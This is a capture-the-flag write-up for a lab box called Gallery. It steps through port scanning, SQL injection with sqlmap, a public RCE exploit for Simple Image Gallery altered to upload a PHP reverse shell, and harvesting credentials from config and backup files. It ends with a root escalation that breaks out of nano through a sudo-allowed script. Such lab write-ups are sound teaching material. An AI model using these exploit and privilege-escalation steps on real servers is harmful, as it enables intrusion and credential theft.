CTF : Gallery
Informations
- IP: 10.10.174.242
- MYIP: 10.8.98.126
First enumeration
Basics
- NMAP
console$ sudo nmap -p- -A 10.10.174.242 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-04 22:17 CET Nmap scan report for 10.10.174.242 Host is up (0.038s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 8080/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-title: Simple Image Gallery System Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops TRACEROUTE (using port 5900/tcp) HOP RTT ADDRESS 1 35.28 ms 10.8.0.1 2 35.42 ms 10.10.174.242 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 68.11 seconds
CMS => Simple Image Gallery
Vulnerabilities search
As we arrive directly to a login page I gonna try if a sqli is possible using sqlmap. First I capture the post request via Burp and save it to post.txt. Then :
consolesqlmap -r post.txt --level=5 --risk=3 --dump
admin:a228b12a08b6527e7978cbe5d914531c
So I managed to retrieve admin password hash but I failed to crack it.
Well, is there another exploit ?
console$ searchsploit simple image gallery ------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------- --------------------------------- Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities | php/webapps/49064.txt Joomla! Component Kubik-Rubik Simple Image Gallery Extended (SIGE) 3.2.3 - Cross-Sit | php/webapps/44104.txt Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated) | php/webapps/50214.py Simple Image Gallery System 1.0 - 'id' SQL Injection | php/webapps/50198.txt ------------------------------------------------------------------------------------- ---------------------------------
Yes ! I'll try the RCE :
console$ searchsploit -m php/webapps/50214.py
Exploit
I modified the python script to load a reverse shell php script
console$ python3 50214.py TARGET = 10.10.174.242:8080 Login Bypass shell name TagomzapqroqzemplsqLetta protecting user User ID : 1 Firsname : Adminstrator Lasname : Admin Username : admin shell uploading - OK - Shell URL : http://10.10.174.242/gallery/uploads/1646430120_TagomzapqroqzemplsqLetta.php?cmd=whoami
And now :
console$ curl http://10.10.174.242/gallery/uploads/1646430120_TagomzapqroqzemplsqLetta.php
We got a shell \o/
Privilege escalation
Enumeration for privesc
There is two users ubuntu and mike :
ubuntu:x:1000:1000:ubuntu:/home/ubuntu:/bin/bash
mike:x:1001:1001:mike:/home/mike:/bin/bashIn /var/www/html/gallery :
console$ cat initialize.php <?php $dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>''); if(!defined('base_url')) define('base_url',"http://" . $_SERVER['SERVER_ADDR'] . "/gallery/"); if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' ); if(!defined('dev_data')) define('dev_data',$dev_data); if(!defined('DB_SERVER')) define('DB_SERVER',"localhost"); if(!defined('DB_USERNAME')) define('DB_USERNAME',"gallery_user"); if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"passw0rd321"); if(!defined('DB_NAME')) define('DB_NAME',"gallery_db");
But this is not mike's password :(
Found another interresting file but ... I think it's not for now ;)
console$ cat /opt/rootkit.sh #!/bin/bash read -e -p "Would you like to versioncheck, update, list or read the report ? " ans; # Execute your choice case $ans in versioncheck) /usr/bin/rkhunter --versioncheck ;; update) /usr/bin/rkhunter --update;; list) /usr/bin/rkhunter --list;; read) /bin/nano /root/report.txt;; *) exit;; esac
Huum ! In /var/backups :
drwxr-xr-x 5 root root 4096 May 24 2021 mike_home_backupAnd then :
console$ cat /var/backups/mike_home_backup/documents/accounts.txt Spotify : mike@gmail.com:mycat666 Netflix : mike@gmail.com:123456789pass TryHackme: mike:darkhacker123
But again none of these pass works :(
Then I go to /var/backups/mike_home_backup/.bash_history and there where a sudo command with the valid password :)
Ok I can su to mike's account.
Don't forget to retrieve user flag ;)
$ cat /home/mike/user.txtAnd mike can use sudo :
console$ sudo -l Matching Defaults entries for mike on gallery: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User mike may run the following commands on gallery: (root) NOPASSWD: /bin/bash /opt/rootkit.sh
This is the shell script we found earlier. Now we can execute it as root. The 4th choice is iterresting because it's summon nano. And from nano we can execute a command :)
Exploit
Let's go :
console$ sudo /bin/bash /opt/rootkit.sh Would you like to versioncheck, update, list or read the report ? read
Then when nano is openned type ctrl+r then ctrl+x and after type : reset; sh 1>&0 2>&0 and a root shell is open :
console# cat /root/root.txt
\o/